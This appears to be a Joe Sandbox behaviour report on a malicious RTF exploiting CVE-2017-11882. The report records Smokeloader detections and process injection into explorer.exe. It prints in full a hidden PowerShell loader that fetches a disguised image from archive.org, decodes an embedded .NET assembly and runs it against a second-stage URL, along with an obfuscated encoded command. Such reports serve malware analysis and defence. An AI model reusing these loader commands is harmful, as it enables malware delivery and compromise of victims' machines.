            Source: C:\Windows\explorer.exeCode function: 20_2_000638B0 NtUnmapViewOfSection,20_2_000638B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,21_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,22_2_00083D8D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,22_2_00082E1B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection,22_2_00081F4E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_00081FE5
            Source: C:\Windows\explorer.exeCode function: 23_2_00065300 RtlAllocateHeap,NtUnmapViewOfSection,23_2_00065300
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,24_2_000C1016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C1A80 NtCreateSection,NtMapViewOfSection,24_2_000C1A80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C1819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,24_2_000C1819
            Source: C:\Windows\explorer.exeCode function: 25_2_0006355C RtlAllocateHeap,NtUnmapViewOfSection,25_2_0006355C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,26_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00081B26 NtCreateSection,NtMapViewOfSection,26_2_00081B26
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_000818BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,26_2_000818BF
            Source: C:\Windows\explorer.exeCode function: 27_2_0006370C RtlAllocateHeap,NtUnmapViewOfSection,27_2_0006370C
            Source: C:\Windows\explorer.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00554D587_2_00554D58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00554D487_2_00554D48
            Source: C:\Windows\explorer.exeCode function: 12_2_0280284012_2_02802840
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C219819_2_000C2198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000CC2F919_2_000CC2F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000DB35C19_2_000DB35C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0011443819_2_00114438
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000DB97E19_2_000DB97E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C6E6A19_2_000C6E6A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000E5F0819_2_000E5F08
            Source: C:\Windows\explorer.exeCode function: 20_2_00061E2020_2_00061E20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008170B21_2_0008170B
            Source: C:\Windows\explorer.exeCode function: 23_2_00062C0023_2_00062C00
            Source: C:\Windows\explorer.exeCode function: 25_2_0006205425_2_00062054
            Source: C:\Windows\explorer.exeCode function: 25_2_0006286025_2_00062860
            Source: C:\Windows\explorer.exeCode function: 27_2_00062A0427_2_00062A04
            Source: C:\Windows\explorer.exeCode function: 27_2_000620F427_2_000620F4
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\gwseuha D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 000C8801 appears 40 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 000C7F70 appears 32 times
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winRTF@36/20@10/3
            Source: C:\Windows\explorer.exeCode function: 12_2_02803BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,12_2_02803BF4
            Source: C:\Windows\explorer.exeCode function: 12_2_028035E8 CoCreateInstance,12_2_028035E8
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR69E9.tmpJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P..............................*.........................s............................0...............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P..............................*.........................s............................X...............Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfVirustotal: Detection: 50%
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\gwseuha C:\Users\user\AppData\Roaming\gwseuha
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
